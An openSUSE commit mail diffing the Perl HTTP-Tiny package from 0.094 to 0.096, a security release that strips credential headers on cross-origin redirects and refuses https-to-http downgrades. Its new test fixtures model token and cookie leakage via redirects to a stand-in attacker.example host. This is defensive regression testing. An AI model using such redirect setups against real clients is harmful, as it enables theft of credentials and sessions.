Script 'mail_helper' called by obssrc Hello community, here is the log from the commit of package perl-HTTP-Tiny for openSUSE:Factory checked in at 2026-06-08 16:54:52 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Comparing /work/SRC/openSUSE:Factory/perl-HTTP-Tiny (Old) and /work/SRC/openSUSE:Factory/.perl-HTTP-Tiny.new.2375 (New) ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Package is "perl-HTTP-Tiny" Mon Jun 8 16:54:52 2026 rev:23 rq:1357974 version:0.096 Changes: -------- --- /work/SRC/openSUSE:Factory/perl-HTTP-Tiny/perl-HTTP-Tiny.changes 2026-05-18 17:48:59.934737706 +0200 +++ /work/SRC/openSUSE:Factory/.perl-HTTP-Tiny.new.2375/perl-HTTP-Tiny.changes 2026-06-08 16:54:56.281384246 +0200 @@ -1,0 +2,16 @@ +Mon Jun 8 09:57:24 UTC 2026 - Tina Müller <[email protected]> + +- updated to 0.096 + see /usr/share/doc/packages/perl-HTTP-Tiny/Changes + + 0.096 2026-06-08 11:21:49+02:00 Europe/Brussels + - No changes from 0.095-TRIAL + 0.095 2026-06-03 13:10:05+02:00 Europe/Brussels (TRIAL RELEASE) + [!!! SECURITY !!!] + - Caller-supplied C<Authorization>, C<Cookie>, and C<Proxy-Authorization> + headers are now stripped on cross-origin redirects by default. Use + allow_credentialed_redirects to opt out. + - Redirects are no longer automatically followed when going from https to http. + Use allow_downgrade to revert to the original behaviour. + +------------------------------------------------------------------- Old: ---- HTTP-Tiny-0.094.tar.gz New: ---- HTTP-Tiny-0.096.tar.gz ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Other differences: ------------------ ++++++ perl-HTTP-Tiny.spec ++++++ --- /var/tmp/diff_new_pack.5F5B63/_old 2026-06-08 16:54:57.173421211 +0200 +++ /var/tmp/diff_new_pack.5F5B63/_new 2026-06-08 16:54:57.181421542 +0200 @@ -18,7 +18,7 @@ %define cpan_name HTTP-Tiny Name: perl-HTTP-Tiny -Version: 0.094 +Version: 0.096 Release: 0 License: Artistic-1.0 OR GPL-1.0-or-later Summary: Small, simple, correct HTTP/1.1 client ++++++ HTTP-Tiny-0.094.tar.gz -> HTTP-Tiny-0.096.tar.gz ++++++ diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/Changes new/HTTP-Tiny-0.096/Changes --- old/HTTP-Tiny-0.094/Changes 2026-05-17 10:31:03.000000000 +0200 +++ new/HTTP-Tiny-0.096/Changes 2026-06-08 11:21:52.000000000 +0200 
@@ -1,5 +1,19 @@ Release notes for HTTP-Tiny +0.096 2026-06-08 11:21:49+02:00 Europe/Brussels + + - No changes from 0.095-TRIAL + +0.095 2026-06-03 13:10:05+02:00 Europe/Brussels (TRIAL RELEASE) + [!!! SECURITY !!!] + + - Caller-supplied C<Authorization>, C<Cookie>, and C<Proxy-Authorization> + headers are now stripped on cross-origin redirects by default. Use + allow_credentialed_redirects to opt out. + + - Redirects are no longer automatically followed when going from https to http. + Use allow_downgrade to revert to the original behaviour. + 0.094 2026-05-17 10:31:00+02:00 Europe/Brussels - No changes from 0.093-TRIAL diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/MANIFEST new/HTTP-Tiny-0.096/MANIFEST --- old/HTTP-Tiny-0.094/MANIFEST 2026-05-17 10:31:03.000000000 +0200 +++ new/HTTP-Tiny-0.096/MANIFEST 2026-06-08 11:21:52.000000000 +0200 @@ -81,6 +81,20 @@ corpus/redirect-08.txt corpus/redirect-09.txt corpus/redirect-10.txt +corpus/redirect-11.txt +corpus/redirect-12.txt +corpus/redirect-13.txt +corpus/redirect-14.txt +corpus/redirect-15.txt +corpus/redirect-16.txt +corpus/redirect-17.txt +corpus/redirect-18.txt +corpus/redirect-19.txt +corpus/redirect-20.txt +corpus/redirect-21.txt +corpus/redirect-22.txt +corpus/redirect-23.txt +corpus/redirect-24.txt corpus/snake-oil.crt cpanfile dist.ini diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/META.json new/HTTP-Tiny-0.096/META.json --- old/HTTP-Tiny-0.094/META.json 2026-05-17 10:31:03.000000000 +0200 +++ new/HTTP-Tiny-0.096/META.json 2026-06-08 11:21:52.000000000 +0200 @@ -107,7 +107,7 @@ "provides" : { "HTTP::Tiny" : { "file" : "lib/HTTP/Tiny.pm", - "version" : "0.094" + "version" : "0.096" } }, "release_status" : "stable", 
@@ -122,7 +122,7 @@ "web" : "https://github.com/Perl-Toolchain-Gang/HTTP-Tiny" } }, - "version" : "0.094", + "version" : "0.096", "x_authority" : "cpan:DAGOLDEN", "x_contributors" : [ "Alan Gardner <[email protected]>", diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/META.yml new/HTTP-Tiny-0.096/META.yml --- old/HTTP-Tiny-0.094/META.yml 2026-05-17 10:31:03.000000000 +0200 +++ new/HTTP-Tiny-0.096/META.yml 2026-06-08 11:21:52.000000000 +0200 @@ -39,7 +39,7 @@ provides: HTTP::Tiny: file: lib/HTTP/Tiny.pm - version: '0.094' + version: '0.096' recommends: HTTP::CookieJar: '0.001' IO::Socket::IP: '0.32' @@ -61,7 +61,7 @@ bugtracker: https://github.com/Perl-Toolchain-Gang/HTTP-Tiny/issues homepage: https://github.com/Perl-Toolchain-Gang/HTTP-Tiny repository: https://github.com/Perl-Toolchain-Gang/HTTP-Tiny.git -version: '0.094' +version: '0.096' x_authority: cpan:DAGOLDEN x_contributors: - 'Alan Gardner <[email protected]>' diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/Makefile.PL new/HTTP-Tiny-0.096/Makefile.PL --- old/HTTP-Tiny-0.094/Makefile.PL 2026-05-17 10:31:03.000000000 +0200 +++ new/HTTP-Tiny-0.096/Makefile.PL 2026-06-08 11:21:52.000000000 +0200 @@ -43,7 +43,7 @@ "lib" => 0, "open" => 0 }, - "VERSION" => "0.094", + "VERSION" => "0.096", "test" => { "TESTS" => "t/*.t" } diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/README new/HTTP-Tiny-0.096/README --- old/HTTP-Tiny-0.094/README 2026-05-17 10:31:03.000000000 +0200 +++ new/HTTP-Tiny-0.096/README 2026-06-08 11:21:52.000000000 +0200 @@ -2,7 +2,7 @@ HTTP::Tiny - A small, simple, correct HTTP/1.1 client VERSION - version 0.094 + version 0.096 SYNOPSIS use HTTP::Tiny; 
@@ -41,9 +41,22 @@ This constructor returns a new HTTP::Tiny object. Valid attributes include: - * "agent" â A user-agent string (defaults to 'HTTP-Tiny/$VERSION'). If - "agent" â ends in a space character, the default user-agent string - is appended. + * "agent" â A user-agent string (defaults to '"HTTP-Tiny/$VERSION"'). + If "agent" â ends in a space character, the default user-agent + string is appended. + + * "allow_credentialed_redirects" - If a "3XX" redirects to a different + scheme, host or port, by default HTTP::Tiny will strip away + caller-supplied "Authorization", "Cookie" and "Proxy-Authorization" + headers from the redirected request and from all subsequent requests + in the chain. Set this to a true value to revert to the legacy + behavior of forwarding those headers. Default is "false". + + * "allow_downgrade" â If a "3XX" redirect changes the scheme from + "https" to plain "http", HTTP::Tiny will by default refuse to follow + it, returning the "3XX" response. Set this to a true value to revert + to the legacy behavior of redirecting "https" to "http". Default is + "false". * "cookie_jar" â An instance of HTTP::CookieJar â or equivalent class that supports the "add" and "cookie_header" methods @@ -130,7 +143,7 @@ response. The "success" field of the response will be true if the status code is - 2XX. + "2XX". post_form $response = $http->post_form($url, $form_data); @@ -150,7 +163,7 @@ will be ignored. The "success" field of the response will be true if the status code is - 2XX. + "2XX". mirror $response = $http->mirror($url, $file, \%options) @@ -166,7 +179,7 @@ header yourself in the "$options->{headers}" hash. The "success" field of the response will be true if the status code is - 2XX or if the status code is 304 (unmodified). + "2XX" or if the status code is 304 (unmodified). If the file was modified and the server response includes a properly formatted "Last-Modified" header, the file modification time will be 
@@ -185,8 +198,7 @@ this applies to redirection. If the URL includes a "user:password" stanza, they will be used for - Basic-style authorization headers. (Authorization headers will not be - included in a redirected request.) For example: + Basic-style authorization headers. For example: $http->request('GET', 'http://Aladdin:open [email protected]/'); @@ -195,6 +207,10 @@ $http->request('GET', 'http://john%40example.com:[email protected]/'); + Caller-supplied "Authorization", "Cookie" and "Proxy-Authorization" + headers are stripped on cross-origin redirects. See "new"'s + "allow_credentialed_redirects" attribute to opt out. + A hashref of options may be appended to modify the request. Valid options are: @@ -249,8 +265,8 @@ The "request" method returns a hashref containing the response. The hashref will have the following keys: - * "success" â Boolean indicating whether the operation returned a 2XX - status code + * "success" â Boolean indicating whether the operation returned a + "2XX" status code * "url" â URL that provided the response. This is the URL of the request unless there were redirections, in which case it is the last diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/corpus/redirect-11.txt new/HTTP-Tiny-0.096/corpus/redirect-11.txt --- old/HTTP-Tiny-0.094/corpus/redirect-11.txt 1970-01-01 01:00:00.000000000 +0100 +++ new/HTTP-Tiny-0.096/corpus/redirect-11.txt 2026-06-08 11:21:52.000000000 +0200 
@@ -0,0 +1,21 @@ +url + https://victim.example/secret +expected + refused-redirect-body +expected_url + https://victim.example/secret +---------- +GET /secret HTTP/1.1 +Host: victim.example +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 302 Found +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 21 +Location: http://victim.example/secret + +refused-redirect-body + diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/corpus/redirect-12.txt new/HTTP-Tiny-0.096/corpus/redirect-12.txt --- old/HTTP-Tiny-0.094/corpus/redirect-12.txt 1970-01-01 01:00:00.000000000 +0100 +++ new/HTTP-Tiny-0.096/corpus/redirect-12.txt 2026-06-08 11:21:52.000000000 +0200 @@ -0,0 +1,36 @@ +url + https://victim.example/secret +expected + success +expected_url + http://victim.example/secret +new_args + allow_downgrade: 1 +---------- +GET /secret HTTP/1.1 +Host: victim.example +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 302 Found +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 8 +Location: http://victim.example/secret + +redirect + +---------- +GET /secret HTTP/1.1 +Host: victim.example +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 200 OK +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 7 + +success diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/corpus/redirect-13.txt new/HTTP-Tiny-0.096/corpus/redirect-13.txt --- old/HTTP-Tiny-0.094/corpus/redirect-13.txt 1970-01-01 01:00:00.000000000 +0100 +++ new/HTTP-Tiny-0.096/corpus/redirect-13.txt 2026-06-08 11:21:52.000000000 +0200 
@@ -0,0 +1,35 @@ +url + https://example.com/index.html +expected + abcdefghijklmnopqrstuvwxyz1234567890abcdef +expected_url + https://example.com/index2.html +---------- +GET /index.html HTTP/1.1 +Host: example.com +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 302 Found +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/html +Content-Length: 53 +Location: https://example.com/index2.html + +<a href="https://example.com/index2.html">redirect</a> + +---------- +GET /index2.html HTTP/1.1 +Host: example.com +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 200 OK +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 42 + +abcdefghijklmnopqrstuvwxyz1234567890abcdef + diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/corpus/redirect-14.txt new/HTTP-Tiny-0.096/corpus/redirect-14.txt --- old/HTTP-Tiny-0.094/corpus/redirect-14.txt 1970-01-01 01:00:00.000000000 +0100 +++ new/HTTP-Tiny-0.096/corpus/redirect-14.txt 2026-06-08 11:21:52.000000000 +0200 
@@ -0,0 +1,35 @@ +url + http://example.com/index.html +expected + abcdefghijklmnopqrstuvwxyz1234567890abcdef +expected_url + https://example.com/index2.html +---------- +GET /index.html HTTP/1.1 +Host: example.com +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 302 Found +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/html +Content-Length: 53 +Location: https://example.com/index2.html + +<a href="https://example.com/index2.html">redirect</a> + +---------- +GET /index2.html HTTP/1.1 +Host: example.com +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 200 OK +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 42 + +abcdefghijklmnopqrstuvwxyz1234567890abcdef + diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/corpus/redirect-15.txt new/HTTP-Tiny-0.096/corpus/redirect-15.txt --- old/HTTP-Tiny-0.094/corpus/redirect-15.txt 1970-01-01 01:00:00.000000000 +0100 +++ new/HTTP-Tiny-0.096/corpus/redirect-15.txt 2026-06-08 11:21:52.000000000 +0200 
@@ -0,0 +1,57 @@ +url + http://victim.example/secret +expected + pwned +expected_url + http://victim.example/back +headers + Authorization: Bearer SECRET-TOKEN + Cookie: session=SECRET-SESSION + Proxy-Authorization: Basic c2VjcmV0OnNlY3JldA== +---------- +GET /secret HTTP/1.1 +Host: victim.example +Authorization: Bearer SECRET-TOKEN +Cookie: session=SECRET-SESSION +Proxy-Authorization: Basic c2VjcmV0OnNlY3JldA== +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 302 Found +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 8 +Location: http://attacker.example/loot + +redirect + +---------- +GET /loot HTTP/1.1 +Host: attacker.example +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 302 Found +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 8 +Location: http://victim.example/back + +redirect + +---------- +GET /back HTTP/1.1 +Host: victim.example +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 200 OK +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 5 + +pwned + diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/corpus/redirect-16.txt new/HTTP-Tiny-0.096/corpus/redirect-16.txt --- old/HTTP-Tiny-0.094/corpus/redirect-16.txt 1970-01-01 01:00:00.000000000 +0100 +++ new/HTTP-Tiny-0.096/corpus/redirect-16.txt 2026-06-08 11:21:52.000000000 +0200 
@@ -0,0 +1,47 @@ +url + http://victim.example/secret +expected + pwned +expected_url + http://attacker.example/loot +new_args + allow_credentialed_redirects: 1 +headers + Authorization: Bearer SECRET-TOKEN + Cookie: session=SECRET-SESSION + Proxy-Authorization: Basic c2VjcmV0OnNlY3JldA== +---------- +GET /secret HTTP/1.1 +Host: victim.example +Authorization: Bearer SECRET-TOKEN +Cookie: session=SECRET-SESSION +Proxy-Authorization: Basic c2VjcmV0OnNlY3JldA== +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 302 Found +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 8 +Location: http://attacker.example/loot + +redirect + +---------- +GET /loot HTTP/1.1 +Host: attacker.example +Authorization: Bearer SECRET-TOKEN +Cookie: session=SECRET-SESSION +Proxy-Authorization: Basic c2VjcmV0OnNlY3JldA== +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 200 OK +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 5 + +pwned + diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/corpus/redirect-17.txt new/HTTP-Tiny-0.096/corpus/redirect-17.txt --- old/HTTP-Tiny-0.094/corpus/redirect-17.txt 1970-01-01 01:00:00.000000000 +0100 +++ new/HTTP-Tiny-0.096/corpus/redirect-17.txt 2026-06-08 11:21:52.000000000 +0200 
@@ -0,0 +1,39 @@ +url + http://example.com/a +expected + ok +expected_url + http://example.com/b +headers + Authorization: Bearer SECRET-TOKEN +---------- +GET /a HTTP/1.1 +Host: example.com +Authorization: Bearer SECRET-TOKEN +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 302 Found +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 8 +Location: http://example.com/b + +redirect + +---------- +GET /b HTTP/1.1 +Host: example.com +Authorization: Bearer SECRET-TOKEN +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 200 OK +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 2 + +ok + diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/corpus/redirect-18.txt new/HTTP-Tiny-0.096/corpus/redirect-18.txt --- old/HTTP-Tiny-0.094/corpus/redirect-18.txt 1970-01-01 01:00:00.000000000 +0100 +++ new/HTTP-Tiny-0.096/corpus/redirect-18.txt 2026-06-08 11:21:52.000000000 +0200 
@@ -0,0 +1,38 @@ +url + http://example.com:8080/foo +expected + ok +expected_url + http://example.com:8081/bar +headers + Authorization: Bearer SECRET-TOKEN +---------- +GET /foo HTTP/1.1 +Host: example.com:8080 +Authorization: Bearer SECRET-TOKEN +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 302 Found +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 8 +Location: http://example.com:8081/bar + +redirect + +---------- +GET /bar HTTP/1.1 +Host: example.com:8081 +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 200 OK +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 2 + +ok + diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/corpus/redirect-19.txt new/HTTP-Tiny-0.096/corpus/redirect-19.txt --- old/HTTP-Tiny-0.094/corpus/redirect-19.txt 1970-01-01 01:00:00.000000000 +0100 +++ new/HTTP-Tiny-0.096/corpus/redirect-19.txt 2026-06-08 11:21:52.000000000 +0200 
@@ -0,0 +1,40 @@ +url + https://example.com:8443/foo +expected + ok +expected_url + http://example.com:8443/foo +new_args + allow_downgrade: 1 +headers + Authorization: Bearer SECRET-TOKEN +---------- +GET /foo HTTP/1.1 +Host: example.com:8443 +Authorization: Bearer SECRET-TOKEN +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 302 Found +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 8 +Location: http://example.com:8443/foo + +redirect + +---------- +GET /foo HTTP/1.1 +Host: example.com:8443 +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 200 OK +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 2 + +ok + diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/corpus/redirect-20.txt new/HTTP-Tiny-0.096/corpus/redirect-20.txt --- old/HTTP-Tiny-0.094/corpus/redirect-20.txt 1970-01-01 01:00:00.000000000 +0100 +++ new/HTTP-Tiny-0.096/corpus/redirect-20.txt 2026-06-08 11:21:52.000000000 +0200 
@@ -0,0 +1,41 @@ +url + http://victim.example/submit +method + POST +expected + ok +expected_url + http://attacker.example/loot +headers + Authorization: Bearer SECRET-TOKEN +---------- +POST /submit HTTP/1.1 +Host: victim.example +Authorization: Bearer SECRET-TOKEN +Connection: close +Content-Length: 0 +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 303 See Other +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 8 +Location: http://attacker.example/loot + +redirect + +---------- +GET /loot HTTP/1.1 +Host: attacker.example +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 200 OK +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 2 + +ok + diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/corpus/redirect-21.txt new/HTTP-Tiny-0.096/corpus/redirect-21.txt --- old/HTTP-Tiny-0.094/corpus/redirect-21.txt 1970-01-01 01:00:00.000000000 +0100 +++ new/HTTP-Tiny-0.096/corpus/redirect-21.txt 2026-06-08 11:21:52.000000000 +0200 
@@ -0,0 +1,38 @@ +url + https://victim.example/x +expected + pwned +expected_url + https://attacker.example/loot +headers + Authorization: Bearer TRUSTED-TOKEN +---------- +GET /x HTTP/1.1 +Host: victim.example +Authorization: Bearer TRUSTED-TOKEN +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 302 Found +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 8 +Location: //attacker.example/loot + +redirect + +---------- +GET /loot HTTP/1.1 +Host: attacker.example +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 200 OK +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 5 + +pwned + diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/corpus/redirect-22.txt new/HTTP-Tiny-0.096/corpus/redirect-22.txt --- old/HTTP-Tiny-0.094/corpus/redirect-22.txt 1970-01-01 01:00:00.000000000 +0100 +++ new/HTTP-Tiny-0.096/corpus/redirect-22.txt 2026-06-08 11:21:52.000000000 +0200 
@@ -0,0 +1,40 @@ +url + http://example.com/login +expected + ok +expected_url + https://example.com/login +headers + Authorization: Bearer SECRET-TOKEN + Cookie: session=SECRET-SESSION +---------- +GET /login HTTP/1.1 +Host: example.com +Authorization: Bearer SECRET-TOKEN +Cookie: session=SECRET-SESSION +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 302 Found +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 8 +Location: https://example.com/login + +redirect + +---------- +GET /login HTTP/1.1 +Host: example.com +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 200 OK +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 2 + +ok + diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/corpus/redirect-23.txt new/HTTP-Tiny-0.096/corpus/redirect-23.txt --- old/HTTP-Tiny-0.094/corpus/redirect-23.txt 1970-01-01 01:00:00.000000000 +0100 +++ new/HTTP-Tiny-0.096/corpus/redirect-23.txt 2026-06-08 11:21:52.000000000 +0200 
@@ -0,0 +1,36 @@ +url + https://user:[email protected]/secret +expected + ok +expected_url + https://attacker.example/loot +---------- +GET /secret HTTP/1.1 +Host: victim.example +Connection: close +User-Agent: HTTP-Tiny/VERSION +Authorization: Basic dXNlcjpwYXNz + +---------- +HTTP/1.1 302 Found +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 8 +Location: https://attacker.example/loot + +redirect + +---------- +GET /loot HTTP/1.1 +Host: attacker.example +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 200 OK +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 2 + +ok + diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/corpus/redirect-24.txt new/HTTP-Tiny-0.096/corpus/redirect-24.txt --- old/HTTP-Tiny-0.094/corpus/redirect-24.txt 1970-01-01 01:00:00.000000000 +0100 +++ new/HTTP-Tiny-0.096/corpus/redirect-24.txt 2026-06-08 11:21:52.000000000 +0200 @@ -0,0 +1,38 @@ +url + https://user:[email protected]/secret +expected + ok +expected_url + https://attacker.example/loot +new_args + allow_credentialed_redirects: 1 +---------- +GET /secret HTTP/1.1 +Host: victim.example +Connection: close +User-Agent: HTTP-Tiny/VERSION +Authorization: Basic dXNlcjpwYXNz + +---------- +HTTP/1.1 302 Found +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 8 +Location: https://attacker.example/loot + +redirect + +---------- +GET /loot HTTP/1.1 +Host: attacker.example +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 200 OK +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 2 + +ok + diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/dist.ini new/HTTP-Tiny-0.096/dist.ini --- old/HTTP-Tiny-0.094/dist.ini 2026-05-17 10:31:03.000000000 +0200 +++ new/HTTP-Tiny-0.096/dist.ini 2026-06-08 11:21:52.000000000 +0200 
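Review bot: None of the new fixtures exercises credentials supplied through `default_headers` in `new_args`, even though the stripping loop in Tiny.pm iterates over both `default_headers` and the per-request `headers`; a copy of redirect-15 with `new_args` / `default_headers: { Authorization: ... }` would pin that path. Likewise there is no fixture for a refused downgrade in the middle of a chain (https → https cross-origin → http), which is where the `_strip_credentials` and `allow_downgrade` logic interact. redirect-23/24 show the URL-userinfo `Authorization: Basic` header is dropped on redirect even with `allow_credentialed_redirects: 1`; that appears intentional (pre-existing behaviour) but is worth a one-line note in the Changes entry so it is not read as a gap in the opt-out.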
@@ -12,7 +12,6 @@ stopwords = UA stopwords = proxying stopwords = Tunnelling -stopwords = 2XX stopwords = RFC7230 stopwords = RFC7231 stopwords = RFC7232 diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/lib/HTTP/Tiny.pm new/HTTP-Tiny-0.096/lib/HTTP/Tiny.pm --- old/HTTP-Tiny-0.094/lib/HTTP/Tiny.pm 2026-05-17 10:31:03.000000000 +0200 +++ new/HTTP-Tiny-0.096/lib/HTTP/Tiny.pm 2026-06-08 11:21:52.000000000 +0200 @@ -4,7 +4,7 @@ use warnings; # ABSTRACT: A small, simple, correct HTTP/1.1 client -our $VERSION = '0.094'; +our $VERSION = '0.096'; sub _croak { require Carp; Carp::croak(@_) } @@ -15,9 +15,19 @@ #pod This constructor returns a new HTTP::Tiny object. Valid attributes include: #pod #pod =for :list -#pod * C<agent> — A user-agent string (defaults to 'HTTP-Tiny/$VERSION'). If +#pod * C<agent> — A user-agent string (defaults to 'C<HTTP-Tiny/$VERSION>'). If #pod C<agent> — ends in a space character, the default user-agent string is #pod appended. +#pod * C<allow_credentialed_redirects> - If a C<3XX> redirects to a different scheme, +#pod host or port, by default HTTP::Tiny will strip away caller-supplied +#pod C<Authorization>, C<Cookie> and C<Proxy-Authorization> headers from the +#pod redirected request and from all subsequent requests in the chain. Set this to a +#pod true value to revert to the legacy behavior of forwarding those headers. +#pod Default is C<false>. +#pod * C<allow_downgrade> — If a C<3XX> redirect changes the scheme from C<https> to +#pod plain C<http>, HTTP::Tiny will by default refuse to follow it, returning the +#pod C<3XX> response. Set this to a true value to revert to the legacy behavior of +#pod redirecting C<https> to C<http>. Default is C<false>. #pod * C<cookie_jar> — An instance of L<HTTP::CookieJar> — or equivalent class #pod that supports the C<add> and C<cookie_header> methods #pod * C<default_headers> — A hashref of default headers to apply to requests 
@@ -81,9 +91,9 @@ my @attributes; BEGIN { @attributes = qw( - cookie_jar default_headers http_proxy https_proxy keep_alive - local_address max_redirect max_size proxy no_proxy - SSL_options verify_SSL + allow_credentialed_redirects allow_downgrade cookie_jar default_headers + http_proxy https_proxy keep_alive local_address max_redirect max_size + proxy no_proxy SSL_options verify_SSL ); my %persist_ok = map {; $_ => 1 } qw( cookie_jar default_headers max_redirect max_size @@ -227,7 +237,7 @@ #pod URL must have unsafe characters escaped and international domain names encoded. #pod See C<request()> for valid options and a description of the response. #pod -#pod The C<success> field of the response will be true if the status code is 2XX. +#pod The C<success> field of the response will be true if the status code is C<2XX>. #pod #pod =cut @@ -260,7 +270,7 @@ #pod encoded. See C<request()> for valid options and a description of the response. #pod Any C<content-type> header or content in the options hashref will be ignored. #pod -#pod The C<success> field of the response will be true if the status code is 2XX. +#pod The C<success> field of the response will be true if the status code is C<2XX>. #pod #pod =cut @@ -301,8 +311,8 @@ #pod may specify a different C<If-Modified-Since> header yourself in the C<< #pod $options->{headers} >> hash. #pod -#pod The C<success> field of the response will be true if the status code is 2XX -#pod or if the status code is 304 (unmodified). +#pod The C<success> field of the response will be true if the status code is C<2XX> +#pod or if the status code is C<304> (unmodified). #pod #pod If the file was modified and the server response 